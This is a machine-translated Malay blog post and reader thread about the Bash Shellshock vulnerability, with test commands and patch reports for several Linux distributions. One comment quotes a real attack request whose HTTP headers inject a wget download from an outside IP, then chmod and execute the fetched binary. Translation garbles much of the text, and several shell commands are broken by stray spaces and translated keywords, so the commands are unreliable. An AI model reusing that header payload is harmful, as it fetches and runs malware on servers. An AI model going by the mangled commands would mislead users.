Ia berjalan seperti api di beberapa blog, item berita yang diterbitkan di blog keselamatan de Red Hat mengenai kerentanan yang terdapat di Bash kerana penyalahgunaan pemboleh ubah global. Menurut berita asal:
"... Kerentanan ini disebabkan oleh fakta bahawa pemboleh ubah lingkungan dengan nilai yang dibuat khusus dapat dibuat sebelum memanggil bash shell. Pemboleh ubah ini boleh mengandungi kod yang dieksekusi sebaik sahaja shell dipanggil. Nama pemboleh ubah yang dihuraikan ini tidak menjadi masalah, hanya kandungannya. Akibatnya, kerentanan ini didedahkan dalam banyak konteks, sebagai contoh:
- Komando Paksa ia digunakan dalam konfigurasi sshd untuk memberikan kemampuan pelaksanaan perintah terhad untuk pengguna jarak jauh. Kekurangan ini dapat digunakan untuk mengelakkannya dan memberikan pelaksanaan perintah sewenang-wenangnya. Beberapa implementasi Git dan Subversion menggunakan Shell yang dibatasi seperti itu. Penggunaan OpenSSH secara berkala tidak terjejas kerana pengguna sudah mempunyai akses ke konsol.
- Pelayan Apache menggunakan mod_cgi atau mod_cgid akan terpengaruh sekiranya skrip CGI ditulis baik dalam bash, atau sublevels. Sublevel semacam itu digunakan secara implisit oleh sistem / muncul di C, oleh os.system / os.popen di Python, jika menggunakan shell sistem / exec di PHP (ketika berjalan dalam mod CGI), dan buka / sistem di Perl (yang bergantung pada string perintah).
- Skrip PHP yang dilaksanakan dengan mod_php tidak terjejas walaupun sublevel dimainkan.
- Pelanggan DHCP memanggil skrip shell untuk mengkonfigurasi sistem, dengan nilai yang diambil dari pelayan yang berpotensi berbahaya. Ini akan membolehkan perintah sewenang-wenang dijalankan, biasanya sebagai root, pada mesin klien DHCP.
- Pelbagai daemon dan program dengan hak istimewa SUID dapat menjalankan skrip shell dengan nilai variabel persekitaran yang ditetapkan / dipengaruhi oleh pengguna, yang memungkinkan perintah sewenang-wenang dijalankan.
- Apa-apa aplikasi lain yang menghubungkan ke shell atau menjalankan skrip shell seperti menggunakan bash sebagai jurubahasa. Skrip shell yang tidak mengeksport pemboleh ubah tidak rentan terhadap masalah ini, bahkan jika mereka memproses konten yang tidak dipercaya dan menyimpannya di pemboleh ubah shell (kiri) dan sublevel terbuka.
... "
Bagaimana untuk mengetahui sama ada Bash saya terjejas?
Dengan ini, ada cara yang sangat mudah untuk mengetahui apakah kita dipengaruhi oleh kerentanan ini. Sebenarnya, saya menguji Antergos saya dan nampaknya saya tidak mempunyai masalah. Apa yang harus kita lakukan ialah membuka terminal dan meletakkan:
env x = '() {:;}; echo rentan 'bash -c "gema ini adalah ujian"
Sekiranya ia keluar dengan cara ini, kami tidak mempunyai masalah:
env x = '() {:;}; echo rentan 'bash -c "echo this is a test" bash: amaran: x: mengabaikan fungsi definisi fungsi bash: ralat mengimport definisi fungsi untuk `x' ini adalah ujian
Sekiranya hasilnya berbeza, anda harus menggunakan saluran kemas kini pengedaran pilihan kami untuk melihat apakah mereka telah menggunakan patch tersebut. Jadi anda tahu 😉
Dikemas kini: Ini adalah hasil dari rakan sekerja yang menggunakan Ubuntu 14:04:
env x = '() {:;}; echo rentan 'bash -c "echo this is a test" rentan ini adalah ujian
Seperti yang anda lihat, setakat ini ia terdedah.
Saya mempunyai Kubuntu 14.04 dari 64 dan saya juga mendapat:
env x = '() {:;}; echo rentan 'bash -c "gema ini adalah ujian"
terdedah
ini adalah ujian
Saya sudah mengemas kini, tetapi tidak betul. Apa nak buat?
Tunggu mereka dikemas kini. Sudah tentu eOS dikemas kini .. 😀
Peliknya, saya juga mempunyai Kubuntu 14.04
$ env x = '() {:;}; echo rentan 'bash -c "gema ini adalah ujian"
bash: amaran: x: mengabaikan percubaan definisi fungsi
bash: ralat mengimport definisi fungsi untuk `x '
ini adalah ujian
Saya menambah bahawa versi pakej "bash" yang dimuat turun hari ini adalah:
4.3-7ubuntu1.1
http://packages.ubuntu.com/trusty/bash
Dalam kes saya, dengan memberikan arahan, ini hanya memberi saya perkara berikut di terminal:
>
Bagaimanapun, jenaka adalah bahawa saya mengemas kini Debian Wheezy dan itulah yang membuang saya.
Wheezy masih rentan terhadap bug bahagian kedua, sekurang-kurangnya untuk waktu petang (UTC -4: 30) masalahnya masih berlaku: /
Saya baru sahaja mengesahkan bahawa setelah menggunakan kemas kini pagi ini, Slackware atau Debian atau Centos tidak terjejas kerana mereka menerima kemas kini yang sepadan.
Apa yang menjadikan Ubuntu masih rentan pada jam ini? Dan beritahu saya bahawa selamat: D.
Tetapi adakah anda telah mencuba mengemas kini Ubuntu?
Dengan kemas kini hari ini, mereka juga telah memperbaikinya.
OK
Pakar keselamatan memberi amaran mengenai kerentanan 'Bash', ini dapat menimbulkan ancaman yang lebih besar bagi pengguna Perisian Linux daripada cacat Heartbleed, di mana 'penggodam' dapat memanfaatkan bug di Bash untuk menguasai sepenuhnya sistem.
Tod Beardsley, seorang pengurus kejuruteraan di firma keselamatan siber Rapid7, memberi amaran bahawa cacat itu dinilai 10 kerana keparahannya, yang bermaksud ia mempunyai impak maksimum, dan dinilai "rendah" untuk kerumitan eksploitasi, yang bermaksud mudah bagi 'penggodam' serangan. Dengan menggunakan kerentanan ini, penyerang berpotensi menguasai sistem operasi, mengakses maklumat sulit, membuat perubahan, dll. " "Sesiapa yang mempunyai sistem yang menggunakan Bash harus segera menerapkan patch tersebut," tambahnya.
SEBELUM KEBERKESANAN INI YANG MENYAMPAIKAN ALAT LAMA (GNU) tempat Bach dihoskan, lebih mudah bagi Perisian Linux untuk menyingkirkan GNU dan menukar untuk alat BSD.
PS: jangan MENGATASI kebebasan bersuara saya, ... tidak menghina sesiapa, ... jangan hapus mesej saya seperti mesej sebelumnya yang saya telah dihapuskan !.
Oh tolong, jangan keterlaluan. Bagaimana saya membenci orang-orang yang menggunakan BSD dan membenci GNU, Linux atau apa sahaja dari projek-projek ini.
Saya bersama anda dan anda betul-betul betul mengenai keparahan lubang ini.
Itu bukan penapisan, itu adalah redundansi (anda telah membuat komen yang sama di postingan gnome 3.14)
«... Dan dinilai 'RENDAH' UNTUK KESELESAAN eksploitasi, yang bermaksud agak MUDAH untuk serangan penggodam»
Adakah ketidaksesuaian itu dapat dilihat?
Bagaimana mudah untuk mengeksploitasi kerentanan dan pada masa yang sama mempunyai tahap risiko "rendah" kerana sangat kompleks untuk digunakan?
Ini adalah bug yang telah diselesaikan dalam beberapa jam dari pertemuan dan yang, seperti diperlihatkan, tidak ada laporan yang telah dieksploitasi (Tentu saja, ini tidak banyak waktu untuk saling mengenali).
Ini lebih banyak akhbar tabloid daripada risiko sebenar.
Adakah @Staff nampaknya tidak penting bagi anda? Apa yang akan anda beritahu saya sekarang?
GET./.HTTP/1.0
.Pengguna-Ejen: .Terima kasih-Rob
.Cookie: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Host: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
.Rujuk: (). {.:;.};. Wget.-O./tmp/besh.http://162.253.66.76/nginx; .chmod.777. / tmp / besh; ./ tmp / besh;
. Terima:. * / *
$ fail nginx
nginx: ELF 32-bit LSB yang dapat dilaksanakan, Intel 80386, versi 1 (SYSV), dipaut secara statik, untuk GNU / Linux 2.6.18, dilucutkan
$md5sum nginx
5924bcc045bb7039f55c6ce29234e29a nginx
$sha256sum nginx
73b0d95541c84965fa42c3e257bb349957b3be626dec9d55efcc6ebcba6fa489 nginx
Adakah anda tahu apa itu? Tidak berbahaya ...
Situasinya agak serius, tetapi dari sana untuk mengatakan bahawa anda harus berhenti menggunakan bash untuk pilihan BSD, sudah seperti itu, bagaimanapun kemas kini sudah ada, saya hanya menyentuh kemas kini dan tidak ada yang lain.
Sekarang PD, saya rasa ini lebih kepada rakan sejawat @robet, saya tidak fikir bahawa admin di sini berdedikasi untuk menghapus komen seperti ini kerana ya, kerana, sejak saya menyertai komuniti ini, saya mempunyai perasaan itu dan saya harap ia tetap seperti itu.
Greetings.
Anda meletakkan komen yang sama tepat pada dua catatan yang berbeza. Sekiranya anda cuba mempromosikan "sumber" berita, maaf, ini bukan tempat yang tepat.
Bash berasal dari Unix (dan klon GNU-nya). Sistem berasaskan BSD seperti OSX juga terpengaruh, dan menurut Genbeta, mereka belum menambalnya. Begitu juga, untuk mengakses Bash, anda memerlukan akaun pengguna, sama ada tempatan atau melalui SSH.
@Kakitangan:
1.- Ia diklasifikasikan sebagai Tahap 10 (tahap bahaya maksimum) kerana jumlah perkhidmatan yang dapat dipengaruhi oleh bug. Dalam catatan utama mereka membuat kenyataan itu sangat jelas, dengan alasan bahawa pepijat itu boleh mempengaruhi perkhidmatan seperti apache, sshd, program dengan izin suid (xorg, antara lain).
2.- Ia diklasifikasikan sebagai Tingkat Kesukaran Rendah, ketika berkaitan dengan pelaksanaannya, dan contoh terbaik dari ini adalah skrip ujian kerentanan yang telah @elav letakkan di pos. Sangat sukar dilaksanakan, seperti yang anda lihat.
Saya tidak melihat kelebihan dalam maklumat (saya hanya melihat terjemahan Google) dan jika masalahnya agak serius, dan seperti yang anda katakan, ia sudah mempunyai tambalan dan jalan keluar, tetapi tidak untuk itu, ia bukan lagi risiko, dan yang cukup nyata .
@petercheco / @Yukiteru
Jangan salah tafsirkan saya, saya rasa jelas bahawa kritikan saya adalah berita yang dihubungkan oleh Robet dan tertumpu pada ketidaksesuaian dan bukan kelebihan.
Dengan cara yang sama, kita mesti membezakan antara risiko dan bahaya (saya tidak menyebutnya yang terakhir), kita biasanya menggunakannya sebagai sinonim, tetapi di sini, bahaya adalah keupayaan kerosakan bug dan berisiko kemungkinan ia terjadi.
Dalam kes tertentu, saya masuk dari semalam. Itu bukan untuk senarai surat atau perkara seperti itu. Ia untuk distro desktop! Saya mengambil telefon dan menghantar mesej kepada sysadmin dengan pautan dan saya mengesahkan bahawa saya telah semuanya ditambal, kemudian maafkan saya tetapi berita ini tidak membuat saya terjaga.
Di forum lain mereka menyebut tentang kerentanan Bash, "penyelesaian yang dilepaskan Debian dan Ubuntu", tetapi hari ini mereka mendapati bahawa kerentanan masih ada, jadi penyelesaiannya tidak lengkap, itulah yang mereka sebutkan!
Saya melihat bahawa banyak yang mengkritik saya kerana fakta mudah untuk mencegah orang dari tahap kerentanan - disahkan dengan tahap 10 bahaya maksimum, dan menyebut kemungkinan penyelesaian untuk Perisian Linux dalam menghadapi alat GNU yang ketinggalan zaman di mana Bash dihoskan - yang sempurna GNU dapat diganti dengan alat BSD dalam Perisian Linux,… Saya juga menggunakan Linux dan saya suka Linux!
Saya menjelaskan bahawa Bash tidak secara lalai dipasang di BSD, itu adalah satu lagi pakej keserasian Linux yang boleh dipasang di BSD ... ya !. Dan sumbernya diletakkan agar mereka dapat memeriksa berita, kerana banyak pengguna kadang-kadang tidak mempercayai mesej atau komen.
robet: Oleh kerana mereka sudah memberitahu anda berulang-ulang kali, anda sudah memasukkan komen anda dengan berita tersebut dalam siaran, anda tidak perlu memasukkannya ke dalam setiap pos yang anda komen.
Mengenai bash, kerana ada cengkerang lain yang dapat digunakan jika Bash rentan. 😉
Robet, yang saya tahu tidak ada perisian yang menggabungkan kernel linux dengan kawasan pengguna BSD. Yang paling dekat adalah sebaliknya, kBSD + GNU, seperti Gentoo dan Debian. Selain itu, GNU (1983) tidak boleh disebut "kuno" jika selepas BSD (1977). Mereka berdua berkongsi root unix mereka (tetapi bukan kodenya), tidak akan ada "keserasian Linux" jika Bash dibuat ketika Linus T masih kecil.
Uff, ujian debian pada masa ini "terdedah" betapa beruntungnya kita ...
Saya menggunakan Ujian Debian dan bahkan di cawangan ini kami telah menerima kemas kini bash
menurut genbeta ada juga kelemahan lain
http://seclists.org/oss-sec/2014/q3/685
arahan untuk pertanyaan adalah
env X = '() {(a) => \' sh -c "echo rentan"; bash -c "echo Failure 2 tidak ditandingi"
sama saya.
Sama disini. Tetapi pepijat asal di pos itu ditambal di (L) Ubuntu 14.04
alih-alih melakukan gema sederhana, cuba membuatnya melaksanakan arahan yang memerlukan hak istimewa, saya membuang "hak istimewa yang tidak mencukupi" ... bug ini tidak meningkatkan hak istimewa?
Anda betul !! mereka adalah dua kelemahan ...
Bagi saya di Linux Mint 17 setelah kemas kini bash kedua yang mereka masukkan di repositori Ubuntu malam tadi, setelah menjalankan perintah itu, shell menawarkan output ini:
env X = '() {(a) => \' sh -c "echo rentan"; bash -c "echo Fail 2 tidak ditambal"
>
Versi "bassh" yang dimasukkan ke repositori Ubuntu untuk mengemas kini versi sebelumnya adalah:
4.3-7ubuntu1.2
Pada sistem yang berasal dari Debian, anda boleh memeriksa versi yang dipasang dengan arahan ini:
dpkg -s bash | grep Versi
Bagaimanapun, ia harus diperjelaskan, sekurang-kurangnya untuk pengguna Debian, Ubuntu dan Mint; Anda tidak perlu terlalu bimbang tentang program yang menjalankan skrip dengan tajuk #! / Bin / sh kerana pengedaran tersebut / bin / sh tidak memanggil "bash", tetapi mengikat pada shell "dash" (dash adalah :)
Debian Alchemist Console (dash) adalah konsol POSIX yang berasal
dari abu.
.
Oleh kerana ia melaksanakan skrip lebih cepat daripada bash, dan mempunyai lebih sedikit pergantungan
perpustakaan (menjadikannya lebih mantap daripada kegagalan perisian atau
perkakasan), ia digunakan sebagai konsol sistem lalai pada sistem
Debian.
Jadi, sekurang-kurangnya di Ubuntu, "bash" digunakan sebagai shell untuk login pengguna (juga untuk pengguna root). Tetapi mana-mana pengguna boleh menggunakan shell lain secara lalai untuk pengguna dan konsol root (terminal).
Sangat mudah untuk memeriksa bahawa shell melaksanakan skrip (#! / Bin / sh) dengan melaksanakan perintah berikut:
fail / bin / sh
(outputnya adalah / bin / sh: pautan simbolik ke `dash ') kita mengikuti jejak yang mengulangi perintah
fail / tong / tanda hubung
(outputnya adalah / bin / dash: objek bersama LSB ELF 64-bit, x86-64, versi 1 (SYSV) jadi ini dapat dilaksanakan.
Ini adalah hasil dari sebaran Linux Mint 17. Pada pengedaran bukan Ubuntu / Debian yang lain mungkin berbeza.
Tidak sukar untuk menukar shell lalai !! anda bahkan boleh menggunakan yang lain untuk pengguna dan pengguna root. Sebenarnya anda hanya perlu memasang cengkerang pilihan anda dan mengubah lalai dengan perintah "chsh" atau dengan mengedit fail / etc / passwd (walaupun pengguna yang tidak mengetahui akibat dari kesalahan ketika menyunting fail "passwd", itu adalah Lebih baik mereka memberitahu diri mereka dengan baik dan sebelum menyuntingnya, buat salinan yang asal sekiranya perlu untuk mendapatkannya semula).
Saya berasa lebih selesa dengan "tcsh" (tcsh is :)
Konsol TENEX C, versi Berkeley csh yang diperbaiki
"Csh" adalah yang digunakan oleh Mac OS X beberapa tahun yang lalu. Sesuatu yang logik memandangkan sebahagian besar sistem operasi Apple adalah kod FreeBSD. Sekarang dari apa yang saya baca semalam, nampaknya mereka juga menyediakan "bash" untuk terminal pengguna.
KESIMPULAN:
- Versi "bash" yang ditambal telah diedarkan "untuk pengedaran yang paling banyak digunakan"
- Versi "bash" 4.3-7ubuntu1.2 dan yang lebih baru tidak mengandungi pepijat ini
- Tidak wajib menggunakan "bash" dalam OS * Linux
- Beberapa * edaran Linux menghubungkan #! / Bin / sh dengan "bash"
- Terdapat alternatif: abu, dash, csh, tcsh dan beberapa lagi
- Tidak rumit untuk mengubah shell lalai yang dipanggil oleh sistem semasa membuka terminal
- Beberapa alat kecil (router dan lain-lain) menggunakan "bash", kerana sangat besar !!
Sekarang kemas kini baru tiba yang memasang versi lain "bash" 4.3-7ubuntu1.3
Untuk Linux Mint 17 dan Ubuntu 14.04.1 LTS
ArchLinux memasukkan versi bash-4.3.026-1
@ Xurxo… .csh dari Berkeley ?,… Anda faham tentang apa yang saya nyatakan di atas, dan lebih baik menggunakan “csh” BSD daripada alat GNU lama tempat Bash dihoskan. Alat itu adalah yang terbaik untuk Perisian Linux.
Saya rasa ini adalah pepijat
https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=762760
betul?
Dan apakah penyelesaiannya?
Tunggu mereka mengemas kini pakej di distro anda 😉
Bug itu dibaptis sebagai kerang
http://www.theregister.co.uk/2014/09/24/bash_shell_vuln/
terdedah
ini adalah ujian
Belum ada patch untuk Ubuntu Studio 14.04
Dibaiki di Ubuntu Studio 14.04.1
wisp @ ubuntustudio: ~ $ env x = '() {:;}; echo rentan 'bash -c "gema ini adalah ujian"
bash: amaran: x: mengabaikan percubaan definisi fungsi
bash: ralat mengimport definisi fungsi untuk `x '
ini adalah ujian
Sebenarnya ia adalah kerentanan kecil, jika itu mempengaruhi anda, itu adalah bahawa anda pernah melakukan sesuatu yang salah sebelum ...
Kerana skrip bash yang berjalan dengan hak root tidak boleh didedahkan kepada pengguna. Dan jika dia berlari tanpa hak istimewa, tidak ada kebodohan seperti itu. Sebenarnya, itu karut. Banyak masalah parut.
Saya juga fikir begitu.
Tepat, untuk menjual lebih banyak surat khabar atau mendapat lebih banyak lawatan, pepijat ini bagus.
Tetapi mereka selalu lupa menyebutkan bahawa untuk melanggar komputer dengan skrip seperti ini, anda mesti mempunyai akses ke bash dan kemudian memilikinya sebagai root.
kakitangan jika anda menggunakan apache dengan cgi, masukkan header http sebagai kuki atau rujuk fungsi yang ingin anda laksanakan. Ia bahkan digunakan untuk menyebarkan cacing.
dan jika seseorang meletakkan shell ke pelayan dengan wget mishell.php, dalam hal ini tidak serius, bukan?
Bersetuju dengan anda. Saya fikir ia adalah bug besar seperti yang ada di Heartbleed (malah NSA meminjamkan dirinya sendiri untuk meningkatkan morbiditi), tetapi bagaimanapun ia adalah bug kecil.
Terdapat pepijat lain yang sangat serius seperti penggunaan Flash yang gila dan prestasi yang perlahan dalam Pemain Flash Lada, dan yang sudah diperbaiki bug webRTC di Chrome dan Firefox.
Adakah anda tahu jika ia mempunyai pengaturan untuk orang yang mempunyai Linux Mint 16?
Dalam ujian Debian, ia sudah diperbaiki.
Dalam 5 distro saya diselesaikan, di OS X saya tidak tahu.
Tolong jangan menapis komen saya, kata OS X. Saya tidak tahu adakah anda boleh mengatakan OS X di laman web ini.
@yoyo jangan terlalu gementar kerana mereka masih mengusahakan beberapa butiran patch ... cubalah ini dan kemudian beritahu saya bagaimana XD
env x = '() {:;}; echo rentan 'bash -c "echo Saya lebih terdedah daripada sampah iphone 6"
Sekiranya mereka menyelesaikannya 100% sebelum OS X saya bertaruh apa-apa
Baiklah, walaupun di Ars Technica mereka memberi kaitan dengan Bash di OSX.
@Yoyo komen seterusnya mengenai OS X untuk SPAM .. lla tu jimat .. 😛
@yoyo di sana untuk memperbaiki petikan ... tetapi selebihnya anda tahu 😉
FSF telah bercakap
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
Seperti mereka telah menjadi patronisasi dengan OSX (kerana OSX masih menggunakan Bash: v).
Bagaimanapun, saya tidak perlu main-main dengan Debian Jessie.
Sekiranya sistem terdedah pada Cent OS:
yum bersihkan semua && yum update bash
untuk melihat versi bash:
rpm -qa | grep bash
Sekiranya versi lebih awal daripada bash-4.1.2-15.el6_5.1 sistem anda mungkin terdedah!
Greetings.
Kerentanan ke-2 belum dapat diselesaikan
env amvariable2 = '() {(a) => \' sh -c "echo amVulnerable"; bash -c "echo Failure 2 tidak ditandingi"
Mengemas kini ...
Sebaliknya berlaku pada saya di Gentoo, saya hanya terdedah kepada kegagalan pertama tetapi dengan yang kedua saya mendapat ini:
[code] sh: X: line 1: ralat sintaksis berhampiran elemen yang tidak dijangka `= '
sh: X: baris 1: "
sh: definisi fungsi mengimport ralat untuk `X '
sh: rentan: arahan tidak dijumpai
Bug 2 tidak ditampal
[/kod]
Saya tidak tahu sama ada sudah ada versi Bash yang stabil dengan bug diperbaiki, tetapi kedua-dua cara ini akan ditangguhkan untuk kali berikutnya saya melakukan emerge –sync && emerge –update –deep –with-bdeps = dan - newuse @world (begitulah cara saya mengemas kini keseluruhan sistem).
Saya mempunyai Gentoo dengan versi 4.2_p50 dan setakat ini telah lulus semua ujian. Cuba muncul -sync dan kemudian muncul -av1 app-shells / bash, dan kemudian periksa bahawa anda mempunyai versi 4.2_p50 menggunakan perintah bash –version.
Adakah anda pernah mencuba ini?
Dan dengan pakej baru, ujian baru yang disediakan oleh Red Hat kepada kami
cd / tmp; rm -f / tmp / gema; env 'x = () {(a) => \' bash -c "tarikh gema"; kucing / tmp / gema
Sekiranya sistem kita tidak mudah terjejas dan ditambal dengan betul, ia harus memberi kita sesuatu seperti ini
1 tarikh
2 cat: / tmp / echo: Fail atau direktori tidak ada
Cubalah dengan cara ini:
env X = '() {(a) => \' sh -c "echo rentan"; bash -c "echo Failure 2 ditambal"
saya dapat
terdedah
Bug 2 ditampal.
Lupakan saja, barisnya tidak diformat dengan baik.
Hebat! Saya sudah melakukan kemas kini pada Slackware saya, terima kasih!
Hai, saya ada soalan, saya mempunyai beberapa pelayan dengan "SUSE Linux Enterprise Server 10" 64 bit.
Apabila saya menjalankan perintah yang saya rentan, saya lebih rentan daripada sampah iPhone 6 xD
Sekiranya saya tidak salah untuk mengemas kini / memasang pakej di SUSE, ia dilakukan dengan arahan «zypper».
Di beberapa pelayan, saya memberitahu perkara ini:
BIAL: ~ # zypper ke atas
-bash: zypper: arahan tidak dijumpai
BIAL: ~ #
Dan yang lain ini:
SMB: ~ # zypper ke atas
Memulihkan sumber sistem…
Menghuraikan metadata untuk SUSE Linux Enterprise Server 10 SP2-20100319-161944…
Menghuraikan pangkalan data RPM ...
Ringkasan:
Tiada kaitan.
Apa saya buat?
Saya tahu bahawa ada yang mengatakan kerentanan kurang daripada apa yang mereka cat, tetapi saya memilikinya dan saya tidak mahu terdedah kepada risiko, baik kecil atau besar.
Greetings.
Selamat malam, saya telah mencuba menampal kod yang anda berikan dalam artikel, saya mendapatkannya
sanders @ pc-sanders: ~ $ env x = '() {:;}; echo rentan 'bash -c "gema ini adalah ujian"
ini adalah ujian
sanders @ pc-sanders: ~ $
Tolong jelaskan kepada saya cara memperbaiki distro, saya mengemas kini setiap hari dan saya tidak melihat perubahan dalam output arahan.
Thank you very much!